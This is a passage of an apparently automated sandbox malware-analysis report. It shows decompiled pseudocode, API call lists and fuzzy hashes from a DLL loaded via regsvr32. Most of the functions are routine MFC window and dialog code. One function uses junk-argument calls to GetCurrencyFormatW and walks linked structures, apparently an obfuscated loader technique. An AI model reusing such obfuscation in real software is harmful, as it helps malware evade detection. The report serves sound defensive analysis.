					_t96 =  *(E1000EC09(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E10007BF2(_t84, _t100, __eflags);
					E1000A998(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E10005CAE();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E1000EFB3(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E1000EFCE(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E1000C3CA(_t96, __eflags, _t100);
					_t58 = E1000A8F0(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E10007ECA(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E1000EEC4(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E1000A486(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E1000F1A1(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E1000EFCE(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E10007C2C(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E1001FC9C(_t63);
				}
			}
















                                                                                                            0x100080ba
                                                                                                            0x100080ba
                                                                                                            0x100080ba
                                                                                                            0x100080c1
                                                                                                            0x100080c6
                                                                                                            0x100080c8
                                                                                                            0x100080ce
                                                                                                            0x100080d4
                                                                                                            0x100080d7
                                                                                                            0x100080dc
                                                                                                            0x100080df
                                                                                                            0x100080e1
                                                                                                            0x100080e4
                                                                                                            0x100080eb
                                                                                                            0x100080fc
                                                                                                            0x10008102
                                                                                                            0x10008102
                                                                                                            0x10008108
                                                                                                            0x1000810d
                                                                                                            0x10008113
                                                                                                            0x10008113
                                                                                                            0x10008119
                                                                                                            0x10008123
                                                                                                            0x1000812a
                                                                                                            0x1000812d
                                                                                                            0x10008132
                                                                                                            0x10008135
                                                                                                            0x10008138
                                                                                                            0x1000813b
                                                                                                            0x1000813e
                                                                                                            0x10008146
                                                                                                            0x10008149
                                                                                                            0x10008154
                                                                                                            0x10008156
                                                                                                            0x1000815d
                                                                                                            0x10008163
                                                                                                            0x1000816f
                                                                                                            0x10008171
                                                                                                            0x10008173
                                                                                                            0x10008176
                                                                                                            0x1000817a
                                                                                                            0x10008182
                                                                                                            0x10008184
                                                                                                            0x10008186
                                                                                                            0x1000818d
                                                                                                            0x1000818f
                                                                                                            0x10008193
                                                                                                            0x10008195
                                                                                                            0x1000819a
                                                                                                            0x1000819a
                                                                                                            0x1000818f
                                                                                                            0x10008184
                                                                                                            0x10008176
                                                                                                            0x10008156
                                                                                                            0x10008149
                                                                                                            0x100081a1
                                                                                                            0x100081a6
                                                                                                            0x100081ae
                                                                                                            0x100081b3
                                                                                                            0x100081b4
                                                                                                            0x100081b5
                                                                                                            0x100081ba
                                                                                                            0x100081bf
                                                                                                            0x100081c1
                                                                                                            0x100081c3
                                                                                                            0x100081c5
                                                                                                            0x100081c9
                                                                                                            0x100081cd
                                                                                                            0x100081d0
                                                                                                            0x100081d5
                                                                                                            0x100081d9
                                                                                                            0x100081dd
                                                                                                            0x100081dd
                                                                                                            0x100081e1
                                                                                                            0x100081e6
                                                                                                            0x100081e6
                                                                                                            0x100081e6
                                                                                                            0x100081e8
                                                                                                            0x100081eb
                                                                                                            0x100081f9
                                                                                                            0x100081f9
                                                                                                            0x100081eb
                                                                                                            0x100081fe
                                                                                                            0x10008221
                                                                                                            0x10008224
                                                                                                            0x1000822a
                                                                                                            0x1000822a
                                                                                                            0x1000822f
                                                                                                            0x10008232
                                                                                                            0x10008239
                                                                                                            0x10008239
                                                                                                            0x1000823f
                                                                                                            0x10008242
                                                                                                            0x1000824a
                                                                                                            0x1000824d
                                                                                                            0x10008252
                                                                                                            0x10008252
                                                                                                            0x1000824d
                                                                                                            0x1000825c
                                                                                                            0x10008261
                                                                                                            0x10008266
                                                                                                            0x10008269
                                                                                                            0x1000826e
                                                                                                            0x1000826e
                                                                                                            0x10008274
                                                                                                            0x00000000
                                                                                                            0x1000811b
                                                                                                            0x1000811b
                                                                                                            0x10008277
                                                                                                            0x1000827c
                                                                                                            0x1000827c

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 100080C1
                                                                                                            • FindResourceA.KERNEL32(?,?,00000005), ref: 100080F4
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100080FC
                                                                                                            • LockResource.KERNEL32(?,00000024,100011BE,00000000,00000120), ref: 1000810D
                                                                                                            • GetDesktopWindow.USER32 ref: 10008140
                                                                                                            • IsWindowEnabled.USER32(?), ref: 1000814E
                                                                                                            • EnableWindow.USER32(?,00000000), ref: 1000815D
                                                                                                              • Part of subcall function 1000EFB3: IsWindowEnabled.USER32(?), ref: 1000EFBC
                                                                                                              • Part of subcall function 1000EFCE: EnableWindow.USER32(?,000000FF), ref: 1000EFDB
                                                                                                            • EnableWindow.USER32(?,00000001), ref: 10008239
                                                                                                            • GetActiveWindow.USER32 ref: 10008244
                                                                                                            • SetActiveWindow.USER32(?,?,00000024,100011BE,00000000,00000120), ref: 10008252
                                                                                                            • FreeResource.KERNEL32(?,?,00000024,100011BE,00000000,00000120), ref: 1000826E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1509511306-0
                                                                                                            • Opcode ID: af41f4a29e55a80224d8f74d86220bf91cb66e9945eb366eb3219191cba3f32d
                                                                                                            • Instruction ID: 62cfd41f18e3cc2e1163053c16dc1e50d79b68c3982d3d37ae726430dd99fe76
                                                                                                            • Opcode Fuzzy Hash: af41f4a29e55a80224d8f74d86220bf91cb66e9945eb366eb3219191cba3f32d
                                                                                                            • Instruction Fuzzy Hash: BD517D34A007459FFB11DFA4CC85AAEBAB5FF48781F204029E582B61A6CB755A42CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000C033 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1000C033(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E1001FBF7(E10033663, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000A8F0(1, _t60, _t71,  *(_t71 + 0x14));
					E1000BF47(_t60, E1000A8F0(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E1000BFBD(1, _t66, E1000A8F0(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E1000963A(E1000A8F0(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E1000AEC5(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E1001FC9C( *(_t71 - 0x14));
			}













                                                                                                            0x1000c033
                                                                                                            0x1000c033
                                                                                                            0x1000c033
                                                                                                            0x1000c03a
                                                                                                            0x1000c03f
                                                                                                            0x1000c042
                                                                                                            0x1000c049
                                                                                                            0x1000c04f
                                                                                                            0x1000c053
                                                                                                            0x1000c057
                                                                                                            0x1000c05f
                                                                                                            0x1000c060
                                                                                                            0x1000c063
                                                                                                            0x1000c10c
                                                                                                            0x1000c11e
                                                                                                            0x00000000
                                                                                                            0x1000c069
                                                                                                            0x1000c069
                                                                                                            0x1000c06c
                                                                                                            0x1000c104
                                                                                                            0x1000c123
                                                                                                            0x1000c125
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c06e
                                                                                                            0x1000c06e
                                                                                                            0x1000c071
                                                                                                            0x1000c0ca
                                                                                                            0x1000c0d2
                                                                                                            0x1000c0e0
                                                                                                            0x00000000
                                                                                                            0x1000c073
                                                                                                            0x1000c078
                                                                                                            0x1000c127
                                                                                                            0x1000c13a
                                                                                                            0x1000c07e
                                                                                                            0x1000c08f
                                                                                                            0x1000c0ac
                                                                                                            0x1000c0b4
                                                                                                            0x1000c0b4
                                                                                                            0x1000c078
                                                                                                            0x1000c071
                                                                                                            0x1000c06c
                                                                                                            0x1000c0c1

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1000C03A
                                                                                                            • GetPropA.USER32 ref: 1000C049
                                                                                                            • CallWindowProcA.USER32 ref: 1000C0A3
                                                                                                              • Part of subcall function 1000AEC5: GetWindowRect.USER32 ref: 1000AEED
                                                                                                              • Part of subcall function 1000AEC5: GetWindow.USER32(?,00000004), ref: 1000AF0A
                                                                                                            • SetWindowLongA.USER32 ref: 1000C0CA
                                                                                                            • RemovePropA.USER32 ref: 1000C0D2
                                                                                                            • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1000C0D9
                                                                                                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 1000C0E0
                                                                                                              • Part of subcall function 1000963A: GetWindowRect.USER32 ref: 10009646
                                                                                                            • CallWindowProcA.USER32 ref: 1000C134
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                            • String ID: AfxOldWndProc423
                                                                                                            • API String ID: 2702501687-1060338832
                                                                                                            • Opcode ID: 2b9a5534c446d1e2504235bdd7f96beab8017efbdf1b97bda0119f086f5d1bd4
                                                                                                            • Instruction ID: dfbf0fdf7da19c16620821b7241651b8befac12ff30b1409a2a82cb4b6d679a3
                                                                                                            • Opcode Fuzzy Hash: 2b9a5534c446d1e2504235bdd7f96beab8017efbdf1b97bda0119f086f5d1bd4
                                                                                                            • Instruction Fuzzy Hash: 4F31983680021ABFEB02DFA4CD89DFF7A78EF09391F004124F501A5156DB749A51DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10007ECA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10007ECA(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E1001FBF7(E1003314A, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1000EC09(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1000EC09(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E1000D1F4(_t103, _t104, 0, _t129, _t136, 0x10);
				E1000D1F4(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E1001FC9C(_t65);
					}
					E1000424F(_t132 - 0x1c, E1001044F());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E100123E2(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x1004866c; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E1000C3CA(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E10007926, 0);
							E10001260( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E1000A998(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E100123AB(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E10012309(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E10012022(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E10012014(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E10007EA2(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}
















                                                                                                            0x10007eca
                                                                                                            0x10007eca
                                                                                                            0x10007eca
                                                                                                            0x10007eca
                                                                                                            0x10007ed1
                                                                                                            0x10007ed6
                                                                                                            0x10007ed8
                                                                                                            0x10007edd
                                                                                                            0x10007ee0
                                                                                                            0x10007eea
                                                                                                            0x10007eea
                                                                                                            0x10007ef2
                                                                                                            0x10007ef7
                                                                                                            0x10007efa
                                                                                                            0x10007efd
                                                                                                            0x10007f00
                                                                                                            0x10007f0a
                                                                                                            0x10007f11
                                                                                                            0x10007f3e
                                                                                                            0x10007f41
                                                                                                            0x10007f41
                                                                                                            0x10007f43
                                                                                                            0x10007f25
                                                                                                            0x10007f25
                                                                                                            0x100080b2
                                                                                                            0x100080b7
                                                                                                            0x100080b7
                                                                                                            0x10007f4e
                                                                                                            0x10007f5c
                                                                                                            0x10007f60
                                                                                                            0x10007f6d
                                                                                                            0x10007f72
                                                                                                            0x10007f78
                                                                                                            0x10007f7a
                                                                                                            0x10007fb0
                                                                                                            0x10007fb0
                                                                                                            0x10007fb2
                                                                                                            0x10007ff3
                                                                                                            0x10007ff3
                                                                                                            0x10007ff7
                                                                                                            0x10007ffc
                                                                                                            0x10008001
                                                                                                            0x10008004
                                                                                                            0x10008006
                                                                                                            0x1000800c
                                                                                                            0x10008008
                                                                                                            0x10008008
                                                                                                            0x10008008
                                                                                                            0x10008026
                                                                                                            0x10008028
                                                                                                            0x1000802d
                                                                                                            0x1000804f
                                                                                                            0x10008052
                                                                                                            0x10008054
                                                                                                            0x1000805c
                                                                                                            0x1000805f
                                                                                                            0x10008061
                                                                                                            0x10008068
                                                                                                            0x10008068
                                                                                                            0x10008061
                                                                                                            0x1000806e
                                                                                                            0x10008073
                                                                                                            0x10008075
                                                                                                            0x1000807b
                                                                                                            0x1000807b
                                                                                                            0x10008081
                                                                                                            0x10008083
                                                                                                            0x10008085
                                                                                                            0x10008089
                                                                                                            0x1000808c
                                                                                                            0x10008092
                                                                                                            0x10008092
                                                                                                            0x10008092
                                                                                                            0x10008089
                                                                                                            0x10008094
                                                                                                            0x10008097
                                                                                                            0x1000809c
                                                                                                            0x100080a5
                                                                                                            0x100080a5
                                                                                                            0x100080ad
                                                                                                            0x100080af
                                                                                                            0x100080af
                                                                                                            0x100080af
                                                                                                            0x00000000
                                                                                                            0x100080af
                                                                                                            0x10007fb4
                                                                                                            0x10007fb8
                                                                                                            0x10007fc3
                                                                                                            0x10007fc7
                                                                                                            0x10007fd7
                                                                                                            0x10007fda
                                                                                                            0x10007fde
                                                                                                            0x10007fe3
                                                                                                            0x10007fe6
                                                                                                            0x10007ff1
                                                                                                            0x10007ff1
                                                                                                            0x00000000
                                                                                                            0x10007fe6
                                                                                                            0x10007f7c
                                                                                                            0x10007f7e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007f88
                                                                                                            0x10007f8a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007f94
                                                                                                            0x10007f9b
                                                                                                            0x10007fa0
                                                                                                            0x10007fa2
                                                                                                            0x10007fa4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007fa6
                                                                                                            0x10007fab
                                                                                                            0x10007fad
                                                                                                            0x10007fad
                                                                                                            0x00000000
                                                                                                            0x10007fab
                                                                                                            0x10007f18
                                                                                                            0x10007f23
                                                                                                            0x10007f3a
                                                                                                            0x00000000
                                                                                                            0x10007f3a
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 10007ED1
                                                                                                            • GetSystemMetrics.USER32 ref: 10007F82
                                                                                                            • GlobalLock.KERNEL32 ref: 10007FEB
                                                                                                            • CreateDialogIndirectParamA.USER32(?,?,?,Function_00007926,00000000), ref: 1000801A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                            • String ID: MS Shell Dlg
                                                                                                            • API String ID: 1736106359-76309092
                                                                                                            • Opcode ID: d36f1cedee4abc0f17e012704f78876727180ce03ae2431f8fa6d70f3892889f
                                                                                                            • Instruction ID: 1ea4d1b8922e6c5543e762249093f9d57ee88d3b172a0da63e9484b16312698d
                                                                                                            • Opcode Fuzzy Hash: d36f1cedee4abc0f17e012704f78876727180ce03ae2431f8fa6d70f3892889f
                                                                                                            • Instruction Fuzzy Hash: AF51DD30D0020A9FEB11DBA4CC859EEBBB0FF44380F214568F545EB19ADB349E85CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001534 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001534(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _t22;
				signed int _t45;
				void* _t50;
				void* _t51;
				intOrPtr _t55;
				intOrPtr* _t64;
				void* _t73;

				_t51 = __ecx;
				_t45 = _a16 * _a20;
				_t22 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				_t55 = _a4;
				_a16 = E100014F4(_t51) + _t22 * (_t45 - _a12 + _t55 + _a8) *  *0x100440d4 * 0x34;
				_a12 = _t55 - _t45 - _a12 + _a8;
				_t73 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440cc * 0x24 +  *((intOrPtr*)(_a16 + 0xc));
				_t50 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440e0 +  *((intOrPtr*)(_t73 + 0xc));
				_t64 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440d4 * 0x48 +  *((intOrPtr*)(_t73 + 0xc));
				while(E10001395( *((intOrPtr*)(_t64 + 0x30)) + GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 2, _a24) != 0) {
					_t64 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 0x48 +  *_t64;
					if(_t64 != _t50) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_t64 + 0x18));
			}










                                                                                                            0x10001534
                                                                                                            0x10001539
                                                                                                            0x1000155f
                                                                                                            0x10001561
                                                                                                            0x10001598
                                                                                                            0x100015a9
                                                                                                            0x100015cc
                                                                                                            0x100015ef
                                                                                                            0x10001619
                                                                                                            0x1000161c
                                                                                                            0x10001676
                                                                                                            0x1000167a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000167c
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000155F
                                                                                                              • Part of subcall function 100014F4: GetCurrencyFormatW.KERNEL32 ref: 10001512
